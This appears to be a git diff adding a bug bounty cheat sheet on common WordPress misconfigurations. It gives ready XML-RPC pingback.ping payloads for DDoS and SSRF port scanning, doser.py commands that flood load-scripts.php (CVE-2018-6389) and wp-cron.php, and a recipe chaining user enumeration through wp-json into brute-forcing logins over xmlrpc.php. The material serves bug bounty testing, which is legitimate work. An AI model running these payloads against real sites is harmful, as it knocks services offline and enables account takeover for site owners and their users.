|
| 1 | +# Wordpress Common Misconfiguration |
| 2 | +Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or officially referenced. I will be attaching all poc and reference as well |
| 3 | + |
| 4 | +# Index |
| 5 | +* Wordpress Detection |
| 6 | +* General Scan Tool |
| 7 | +* xmlrpc.php |
| 8 | +* CVE-2018-6389 |
| 9 | +* WP Cornjob DOS |
| 10 | +* WP User Enumeration |
| 11 | + |
| 12 | +# Wordpress Detection |
| 13 | +Well, if you are reading this you already know about technology detection tool and methods. |
| 14 | +Still adding them below |
| 15 | +* Wappalyzer |
| 16 | +* WhatRuns |
| 17 | +* BuildWith |
| 18 | + |
| 19 | +# Geneal Scan Tool |
| 20 | +* WpScan |
| 21 | + |
| 22 | +# xmlrpc.php |
| 23 | +This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well. |
| 24 | + |
| 25 | +### Detection |
| 26 | +* visit site.com/xmlrpc.php |
| 27 | +* Get the error message about POST request only |
| 28 | + |
| 29 | +### Exploit |
| 30 | +* Intercept the request and change the method GET to POST |
| 31 | +* List all Methods |
| 32 | + ``` |
| 33 | + <methodCall> |
| 34 | + <methodName>system.listMethods</methodName> |
| 35 | + <params></params> |
| 36 | + </methodCall> |
| 37 | + ``` |
| 38 | +* Check the ```pingback.ping``` mentod is there or not |
| 39 | +* Perform DDOS |
| 40 | + ``` |
| 41 | + <methodCall> |
| 42 | + <methodName>pingback.ping</methodName> |
| 43 | + <params><param> |
| 44 | + <value><string>http://<YOUR SERVER >:<port></string></value> |
| 45 | + </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string> |
| 46 | + </value></param></params> |
| 47 | + </methodCall> |
| 48 | + ``` |
| 49 | +* Perform SSRF (Internal PORT scan only) |
| 50 | + ``` |
| 51 | + <methodCall> |
| 52 | + <methodName>pingback.ping</methodName> |
| 53 | + <params><param> |
| 54 | + <value><string>http://<YOUR SERVER >:<port></string></value> |
| 55 | + </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string> |
| 56 | + </value></param></params> |
| 57 | + </methodCall> |
| 58 | + ``` |
| 59 | +### References |
| 60 | +[Bug Bounty Cheat Sheet](https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html) |
| 61 | +
|
| 62 | +[Medium Writeup](https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32) |
| 63 | +
|
| 64 | +[WpEngine Blog Post](https://wpengine.com/resources/xmlrpc-php/) |
| 65 | +
|
| 66 | +# CVE-2018-6389 |
| 67 | +This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target website is running wordpress under 4.9.3 |
| 68 | +
|
| 69 | +### Detection |
| 70 | +Use the URL from my gist called loadsxploit, you will get a massive js data in response. |
| 71 | +
|
| 72 | +[loadsxploit](https://gist.github.com/remonsec/4877e9ee2b045aae96be7e2653c41df9) |
| 73 | +
|
| 74 | +### Exploit |
| 75 | +You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second |
| 76 | +
|
| 77 | +[Doser](https://github.com/quitten/doser.py) |
| 78 | +``` |
| 79 | +python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit' |
| 80 | +``` |
| 81 | +### References |
| 82 | +[H1 Report](https://hackerone.com/reports/752010) |
| 83 | +
|
| 84 | +[CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389) |
| 85 | +
|
| 86 | +[Blog Post](https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html) |
| 87 | +
|
| 88 | +
|
| 89 | +# WP Cornjob DOS |
| 90 | +This is another area where you can perform a DOS attack. |
| 91 | +
|
| 92 | +### Detection |
| 93 | +* visit site.com/wp-cron.php |
| 94 | +* You will see a Blank page with 200 HTTP status code |
| 95 | +
|
| 96 | +### Exploit |
| 97 | +You can use the same tool Doser for exploiting this |
| 98 | +``` |
| 99 | +python3 doser.py -t 999 -g 'https://site.com/wp-cron.php' |
| 100 | +``` |
| 101 | +### Reference |
| 102 | +
|
| 103 | +[GitHub Issue](https://github.com/wpscanteam/wpscan/issues/1299) |
| 104 | +
|
| 105 | +[Medium Writeup](https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30) |
| 106 | +
|
| 107 | +# WP User Enumeration |
| 108 | +This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff |
| 109 | +
|
| 110 | +### Detection |
| 111 | +* visit site.com/wp-json/wp/v2/users/ |
| 112 | +* You will see json data with user info in response |
| 113 | +
|
| 114 | +### Exploit |
| 115 | +If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show some extra effort and increase the impact as well |
| 116 | +
|
| 117 | +### Reference |
| 118 | +[H1 Report](https://hackerone.com/reports/356047) |
| 119 | +
|
| 120 | +# Researcher Note |
| 121 | +Please do not depend on those issues at all. I saw people only looking for those issues and nothing else. Those are good to have a look while testing for other vulnerabilities and most of the time they work good for chaining with other low bugs. |
| 122 | +
|
| 123 | +# Author |
| 124 | +**Name:** Mehedi Hasan Remon |
| 125 | +
|
| 126 | +**Handle:** [@remonsec](https://twitter.com/remonsec) |
0 commit comments